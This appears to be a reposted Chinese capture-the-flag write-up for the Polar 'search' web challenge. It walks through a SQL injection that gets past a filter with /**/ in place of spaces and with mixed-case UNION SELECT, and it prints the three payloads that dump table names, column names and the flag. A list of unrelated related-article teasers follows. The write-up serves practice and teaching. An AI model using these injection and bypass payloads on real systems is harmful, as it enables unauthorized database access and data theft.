Polar Web【中等】search

news2024/11/25 18:53:45

Polar Web【中等】search

Contents

  • Polar Web【中等】search
    • 思路&探索
      • 首页
      • 一般注入方式
    • EXP&效果
      • Payload
    • 总结

思路&探索

见到题目标题,预测可能有目录扫描或者输入框查询数据之类情况,具体细节在破解过程中才能清楚

  1. 打开站点,显示为输入框查询功能界面,尝试输入上传数字 1、2...、10 均会返回用户信息,于是考虑到存在SQL注入
  2. 尝试使用单引号闭合接 union 语句,提示被拦截,可确定存在 SQL注入,故需要考虑对其做绕过处理
  3. 测试发现,需要进行 空格绕过 以及 大写绕过,具体 Payload 详见后文
  • 根据回显信息逐层构造 Payload 查询后,获取 flag(本文采用手动注入的方式,尚无脚本)

首页

index

一般注入方式

在这里插入图片描述

EXP&效果

Payload

# 获取表名
1'/**/Union/**/Select/**/1,group_concat(table_name),3,4,5/**/From/**/information_schema.tables/**/Where/**/table_schema=database()#

1

# 获取字段名
1'/**/Union/**/Select/**/1,group_concat(column_name),3,4,5/**/From/**/information_schema.columns/**/Where/**/table _schema=database()/**/and/**/table_name="Flag"#

2

# 获取指定字段值 —— Flag
1'/**/Union/**/Select/**/1,group_concat(Flag),3,4,5/**/From/**/Flag#

3

总结

  • 本题考查的是 SQL注入漏洞的渗透技巧,其中涉及到:
    • 空格绕过 —— /**/
    • 大写绕过 —— Union Select ...







敬,不完美的明天

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1805901.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

less---20-28

less---20-28

less-20 这关登陆成功会显示cookie,所以抓包在cookie处注入 less-21 这关登陆成功会显示cookie,所以抓包在cookie处注入,发现不成功,查看代码发现被编码 先对注入语句进行base64编码再注入 less-22 闭合字符",同21关 less-23 这关查看代码发现…
阅读更多...
什么是 AOF 重写?AOF 重写机制的流程是什么?

什么是 AOF 重写?AOF 重写机制的流程是什么?

引言:在Redis中,持久化是确保数据持久性和可恢复性的重要机制之一。除了常见的RDB(Redis Database)持久化方式外,AOF(Append Only File)也是一种常用的持久化方式。AOF持久化通过记录Redis服务器…
阅读更多...
总结七大排序算法

总结七大排序算法

插入排序 直接插入排序是一种简单的插入排序法,其基本思想是:把待排序的记录按其关键码值的大小逐个插入到一个已经排好序的有序序列中,直到所有的记录插入完为止,得到一个新的有序序列 。实际中我们玩扑克牌时,就用了…
阅读更多...
10.邮票问题

10.邮票问题

上海市计算机学会竞赛平台 | YACSYACS 是由上海市计算机学会于2019年发起的活动,旨在激发青少年对学习人工智能与算法设计的热情与兴趣,提升青少年科学素养,引导青少年投身创新发现和科研实践活动。https://www.iai.sh.cn/problem/625 题目描述 有四种面值的邮票,分别是 …
阅读更多...
【文件导出2】导出html文件数据

【文件导出2】导出html文件数据

导出html文件数据 文章目录 导出html文件数据前言一、实现代码1.controller层2.接口层3.接口实现类4.FileUtil 工具类 二、文件导出效果总结 前言 springBoot项目实现在线导出html文件数据的功能。 一、实现代码 1.controller层 GetMapping("/record/_export") Ap…
阅读更多...
Java——简单图书管理系统

Java——简单图书管理系统

前言: 一、图书管理系统是什么样的?二、准备工作分析有哪些对象?画UML图 三、实现三大模块用户模块书架模块管理操作模块管理员操作有这些普通用户操作有这些 四、Test测试类五、拓展 哈喽,大家好,我是无敌小恐龙。 写…
阅读更多...
评书下载到u盘,下载到内存卡,下载到手机或电脑的方法

评书下载到u盘,下载到内存卡,下载到手机或电脑的方法

评书下载的方法有很多种,无论是通过什么方法,我们都可以快速的获取喜爱的评书。下面将详细介绍常见的评书下载方法,帮助您快速上手。 1、搜索“十方评书网”。 2、要下载那个评书家的选择那个评书家就可以。 3、点击进去后可以一键下载单部评…
阅读更多...
C语言详解(结构体)

C语言详解(结构体)

Hi~!这里是奋斗的小羊,很荣幸各位能阅读我的文章,诚请评论指点,欢迎欢迎~~ 💥个人主页:小羊在奋斗 💥所属专栏:C语言 本系列文章为个人学习笔记,在这里撰写成文一…
阅读更多...
英语学习笔记33——A fine day

英语学习笔记33——A fine day

A fine day 风和日丽 词汇 Vocabulary day n. 日子,白天 复数:days 常见节日:Mothers’ Day 母亲节      Fathers’ Day 父亲节      Teachers’ Day 教师节      Children’s Day 儿童节      Women’s Day 妇女节 c…
阅读更多...
美银美林:看好铜价涨到12000美元,这类铜矿企业弹性更大

美银美林:看好铜价涨到12000美元,这类铜矿企业弹性更大

美银美林指出,考虑到能源转型以及AI投资热潮对铜的需求巨大,到2026年铜供需缺口有望扩大一倍。给予紫金矿业、江西铜业等多家巨头买入评级,并认为一旦铜价上行,KGHM等规模较小、成本较高的企业的利润增长可能更为显著。 高盛、花…
阅读更多...
OpenCV-绘制虚线

OpenCV-绘制虚线

作者:翟天保Steven 版权声明:著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处 功能函数 // 绘制虚线 void DrawDottedLine(cv::Mat &input, cv::Point p1, cv::Point p2, cv::Scalar color, int thickne…
阅读更多...
9.2 Go 接口的实现

9.2 Go 接口的实现

💝💝💝欢迎莅临我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。 推荐:「stormsha的主页」…
阅读更多...
Pytorch 从零实现 Transformer

Pytorch 从零实现 Transformer

前言 之前虽然了解过 Transformer 架构,但是没有自己实现过。 最近阅读 transformers 库中 Llama 模型结构,于是想试着亲手实现一个简单的 Transformer。 在实现过程中加深了理解,同时发现之前阅读 Llama 中一些错误的地方,因此…
阅读更多...
在Anaconda中安装keras-contrib库

在Anaconda中安装keras-contrib库

文章目录 1. 有git2. 无git2.1 步骤12.2 步骤22.3 步骤3 1. 有git 如果环境里有git,直接运行以下命令: pip install githttps://www.github.com/farizrahman4u/keras-contrib.git2. 无git 2.1 步骤1 打开网址:https://github.com/keras-tea…
阅读更多...
Application UI

Application UI

本节包含关于如何用DevExpress控件模拟许多流行的应用程序ui的教程。 Windows 11 UI Windows 11和最新一代微软Office产品启发的UI。 Office Inspired UI Word、Excel、PowerPoint和Visio等微软Office应用程序启发的UI。 如何:手动构建Office风格的UI 本教程演示…
阅读更多...
微服务第二轮

微服务第二轮

学习文档 背景 由于每个微服务都有不同的地址或端口,入口不同 请求不同数据时要访问不同的入口,需要维护多个入口地址,麻烦 前端无法调用nacos,无法实时更新服务列表 单体架构时我们只需要完成一次用户登录、身份校验&#xff…
阅读更多...
Uber 提升 Presto 集群稳定性的 GC 调优方法

Uber 提升 Presto 集群稳定性的 GC 调优方法

Presto at Uber Uber 利用开源的 Presto 查询各种数据源,无论是流式还是归档数据。Presto 的多功能性赋予我们做出基于数据的明智商业决策的能力。我们在两个地区运行了大约20个 Presto 集群,总共超过10,000个节点。我们有大约12,000个每周活跃用户&…
阅读更多...
【python010】获取任意多边形区域内的经纬度点并可视化

【python010】获取任意多边形区域内的经纬度点并可视化

1.熟悉、梳理、总结项目研发实战中的Python开发日常使用中的问题、知识点等,如获取任意多边形区域内的经纬度点并可视化,找了N篇文章没发现有效的解决方案。 2.欢迎点赞、关注、批评、指正,互三走起来,小手动起来! 3.欢…
阅读更多...
Here Doucument

Here Doucument

一、Here Document概述 1.概念 使用I/0重定向的方式将命令列表提供给交互式程序 标准输入的一种替代品 2.语法格式 命令 <<标记 标记 3.注意事项 标记可以使用任意合法字符&#xff08;通常为EOF&#xff09; 结尾的标记一定要顶格写&#xff0c;前面不能有任何字符…
阅读更多...
【爬虫实战项目一】Python爬取豆瓣电影榜单数据

【爬虫实战项目一】Python爬取豆瓣电影榜单数据

目录 一、环境准备 二、编写代码 2.1 分页分析 2.2 编码 一、环境准备 安装requests和lxml pip install requests pip install lxml 二、编写代码 2.1 分页分析 编写代码前我们先看看榜单的url 我们假如要爬取五页的数据&#xff0c;那么五个url分别是&#xff1a; htt…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023